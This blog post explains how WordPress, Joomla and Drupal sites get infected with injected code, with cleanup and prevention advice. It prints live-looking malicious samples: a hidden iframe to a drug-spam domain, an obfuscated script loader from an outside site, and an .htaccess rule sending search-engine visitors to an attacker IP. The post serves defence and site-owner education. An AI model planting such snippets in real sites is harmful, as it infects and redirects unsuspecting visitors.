If you’re using open source software like Wordpress, Joomla or Drupal, you maybe vulnerable to server based software virus. In the old days, you get a virus on your Windows PC and they seek to destroy files, or putting funny messages. In the new days, it’s for exploitation for profit. I have come across several incidence of this and just want to warn you guys in case you come across a Wordpress virus etc. Today, let’s talk about a new wave of attack also known as Wordpress virus, Joomla virus orDrupal virus. You’ll see why it is happening and how it’s done. And for site owners, you’ll learn about how to resolve it and prevent further attacks. We’ll tell you how to deal with a wordpress virus for example.

Before we start, you may ask why are people doing this? Again they’re not doing it for fun. Reading a recent articles, one Canadian Online Pharmacies paid hacking groups to get people to visit their web site and buy online drugs. It’s a new form of advertising if you like. Since you can’t get people to your site via legitimate means, the hacking groups get paid to send people there unknowingly.

One of the more recent attack is using Michael Jackson’s death as a way to first send millions of spam to people to “click here to find out the truth about Michael Jackson’s death”. The unsuspected users would click and their system would be planted a Trojan (if they don’t have adequate security). This computer would then be used as a zombie acting for their master.

• Firstly, the least damaging is that they’ll send you to buy some Canadian online drugs. If it’s a link, no big deal. But sometimes, it overwrites you browser defaults and sends you there every day. Not so cool. What you usually do is, you probably need to re-install your OS.
• Secondly, the Trojan can send banking login/password information to the hackers. Remember that it’s a Trojan therefore a key-logger would be able to track every keystrokes even though the banking web site is secured. Minutes after you log into your banking site, your login and password is transmitted.
• Thirdly, in more recent times, the Trojan can send login and passwords for any server based software. If you happen to be a webmaster or contributors to Wordpress, Drupal or Joomla, you maybe logging into these consoles to make updates to web sites. All of these software logins are weak with no encryption. The login and passwords are sent in the open line. Now remember the point about the spam emails they sent to people as? In the emails that they click, the link sends them to a web site server that’s been hacked (i.e. surely the hackers ain’t gonna spend money to register a domain and set up their own web sites?).

And this is what I am talking about. If hackers find a way to take over your Wordpress blog, they can use it to get more people infected. One of the key reasons why this problem is growing is because alot more people visits and read blogs. Therefore, blogs become a prime target. And Wordpress being a popular choice to build blogs. Similar, Drupal and Joomla have all gained their popularity over the years. They’re the defacto software of choice for millions of web sites.

How does a Wordpress or Joomla virus work? Well in strict sense, it’s not the typical virus we know that will destroy things inside. Instead, they plant codes in your blog or websites so that when visitors go there, they’ll be infected. An example of the code is like this:

<iframe src=”http://drugsforus.cn/in.cgi?income43″ width=1 height=1 style=”visibility: hidden”></iframe>

A very innocent piece of code. For one thing, you may not see it most of the time. Why? It’s small, it doesn’t consume much disk space and it’s probably hard to find. In Wordpress, you’ll see them tagged to the end of the index.php file. In fact, you’ll see that in each directory and sub-directories, you could have all the index.php files added with this line of code or something similar. A related attack is through the use of javascript. It may look something like this:

var ecov = “pa-v”; document.write(unescape(”%3Cscript src=’http://eco-safe.com/js/eco.js’ type=’tex…

The code is simply “obfuscated” meaning the real code is hidden. And it’s even harder for the untrained eyes to see.

And another one which targets Apache web server. The hacker simply rewrite your .htaccess file. Anytime your web sites are referred by the popular search engines like Google, Yahoo! or AOL, your web server will tell the request to redirect to the attacker’s web site. What that means is your users are not even going to reach your home page. They’re simply re-directed and then getting their computer infected. Of course, if you have an antivirus software installed, chances are, you will not be infected as easily. Sometimes when you open your web page, and you see that the status bar is showing a web site that you’re not aware of, your blog or web site maybe fetching something from an attacker’s site.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://attackerswebsite/in.html?s=hg_err 

If you’re a victim of this type of attack, there’s usually a few ways this can happen:

• The blog or website software version you are using has security flaws. Hackers exploit these holes to inject the code into your web site.
• The plugins that you use along with your blog or website  has security flaws. Hackers exploit these holes to inject the code into your web site. One common one is called XSS attack where hackers can plant codes into your site. XSS (Cross site scripting) is a type of computer security exploit where information from one context, where it is not trusted, can be inserted into another context, where it is. From the trusted context, an attack can be launched.” Injection instead of inserted, could be a better term because an XSS vulnerability is exploited by “injecting” malicious code, usually javascript, into a website.
• You simply has a Trojan that transmitted your login and password to your blog or web site. This is the worst type because they can FTP directly into your web site to do the damages they need. Here’s a real FTP server log that displays how hackers are making the attacks by making changes to the index files inside the website. You’ll notice the source IP addresses are different,and the key files they’re touching. They are not targeting every file but only the key files, and usually, the key files to Wordpress, Joomla or Drupal.

Tue Aug 04 07:20:45 2009 0 69.119.17.159 8275 /home/websitename/joomlabackups/public_html/index.php a _ o r websitename ftp 1 * c
Tue Aug 04 07:20:52 2009 0 95.208.255.220 8142 /home/websitename/joomlabackups/public_html/index.php a _ i r websitename ftp 1 * c
Tue Aug 04 07:21:06 2009 0 59.99.0.67 4794 /home/websitename/joomlabackups/public_html/index2.php a _ o r websitename ftp 1 * c
Tue Aug 04 07:21:21 2009 3 61.238.83.124 4764 /home/websitename/joomlabackups/public_html/index2.php a _ i r websitename ftp 1 * c
Tue Aug 04 07:21:31 2009 0 87.1.14.42 1040 /home/websitename/joomlabackups/public_html/mainbody.php a _ o r websitename ftp 1 * c
Tue Aug 04 07:21:38 2009 0 85.186.137.64 1130 /home/websitename/joomlabackups/public_html/mainbody.php a _ i r websitename ftp 1 * c
Tue Aug 04 08:37:38 2009 0 81.13.158.169 144 /administrator/components/com_poll/tables/index.html b _ o r websitename ftp 1 * c
Tue Aug 04 08:56:08 2009 0 81.13.158.169 524 /components/com_banners/index.html b _ o r websitename ftp 1 * c
Tue Aug 04 08:58:14 2009 0 81.13.158.169 524 /components/com_contact/index.html b _ o r websitename ftp 1 * c
Tue Aug 04 09:00:00 2009 0 81.13.158.169 144 /components/com_contact/models/index.html b _ o r websitename ftp 1 * c
Tue Aug 04 09:00:35 2009 2 81.13.158.169 261 /components/com_contact/models/index.html b _ i r websitename ftp 1 * c
Tue Aug 04 09:07:41 2009 0 81.13.158.169 524 /components/com_poll/index.html b _ o r websitename ftp 1 * c

Now that you understood how this works, if you got attacked, what should you do?

Firstly, hopefully you can still log into the backend, is to inspect the file dates and see which directory or files got tempered. You can also review the server log (like above) to see if there’re suspicious activities. With the iframe and javascript script injection method, you can simply replace the files with the original package you downloaded. For example, with Wordpress, simple download or retrieve a copy of the wordpress software and FTP to replace the original files (usually the index.php file in the root directory or the wp-admin and includes directory). The reason why index.php is infected is because every visit to your web site would trigger or touch this file. If this isn’t working, you may simply have to re-install the entire blog or web-site.

Secondly, change your backend and FTP password. Even if you think the hackers exploited your web site through the internet, you should still take pre-caution.With the above log, you can see a number of different IP addresses (e.g. 81.13.158.169, 85.186.137.64). The attack is simply carried out by a number of people or machines. In this instance, the hacker got the login and password, probably through the use of a Trojan, and probably has passed this information to a number of places and probably dozens of other hackers. If you want to dig deeper, you can try to trace these IPs by using http://www.ip-adress.com/ip_tracer/

Thirdly, do a virus check on your PC. Chances are you still have the Trojan inside and therefore, even if you fixed the problem and changed your password, it can happen again when you type in the password next time you update your web site. And the cycle starts again once the hacker got the login and password transmitted to them.

Fourthly, check the real damage. If you noticed the attack within hours or minutes, you can simply try to fix it before the damaged is caused. If you can’t one of the biggest damage is you can have your web site banned. You see, Google and Firefox watches for malicious web sites and will redirect users to a warning page once it has detected malware from your web site. For example, if your web site got hacked and injected with the malicious code, internet users who go to your web page started getting infected or getting warned by their virus protection software. Some of these information will be relayed back to Google and once Google also has a chance to crawl your page (usually every week), you will put onto a blacklist. To check your web site to see if it’s fine or not, you can go here: http://www.google.com/safebrowsing/diagnostic?site=www.danielpoon.com. Now if you got banned, then you will need to clean up your web site, submit a form to Google and they’ll re-crawl your site before the ban is lifted. Google said it could take a maximum of 90 days. Imagine having your site banned for 90 days? This is why it’s important to protect yourself.

One of the most vicious malware from this is the root kit where your computer will simply be totally compromised. Now just to clarify in more details, you may ask how can that one line of code cause all these damages? Well that line of code isn’t the problem. For example, the “iframe” code simply gets the users browser to view content from another web site. It’s the web site that’s planting the virus. Your Wordpress, Drupal and Joomla web site simply got planted one line of code to open the window to these malicious virus web sites. Your website became their agent.

Fifthly, upgrade your software. Wordpress, Drupal and Joomla constantly upgrade their security with newer versions. If you don’t upgrade, then you’re vulnerable to these attacks. Not to mention you will need to watch out for plugins that may cause problems. I know this is hard but maybe look for plugins that are popular to use versus using some of the new plugins that no one has tried before. And then, you’ll need to learn to harden your .htaccess security. Create .htaccess files that are robust (e.g. don’t allow script execution on directories that shouldn’t be executing code).

Sixthly, granted though if you got a Trojan, there’s nothing you can do (i.e. you cannot simply upgrade your software) because the hackers have your password and can do anything they want. Therefore, change your passwords regularly. This is tough to do but it’s a must. At least practice doing it once every 6 months at a very minimum.

Seventhly, never download any free software from places you don’t know. Even though you can get viruses online, you can easily planted them yourself. There’re alot of software on rapidshare who claimed to be cracked and you can download them for free. Well, hackers cracked these software and also planted their virus inside these. One common method is to provide a piece of addon software called keygen. While the users tried to activate the software by opening the keygen software, the virus is now planted to these computers. And they work the same. If it’s a keylogger, passwords are transmitted.

Eighthly (if there’s such a word?),  neverblog or update websites in an internet cafe. Since the login for your web sites aren’t encrypted, you could easily be tapped.

Bookmark this

Related Posts:

• Top Google Chrome Tips n Tricks for Wordpress
• Top 200 Stunning Beijing Olympic Wallpapers
• How to hunt down any files on the internet?
• Top 20 Beijing Olympic Photo Sites
• Top 10 Rapidshare File Search Engines
• How to connect to T-Mobile for AT&T Wifi in Starbucks
• How to browse a web site with all the browsers in the world?
• Things you don’t want to know about Google Streetview
• How I used Facebook and lost all my personal content? – Part 5
• Fixing Blank Remote Desktop Connection Problems
• NEW WAVE: How to avoid credit card and debit card skimmers?
• How to Design New Application User Interface
• Cool Olympic Ads from GE -> Ecomagination
• Hack: Olympics on NBC live without 3hr delay!!!
• Google Hack for the Olympics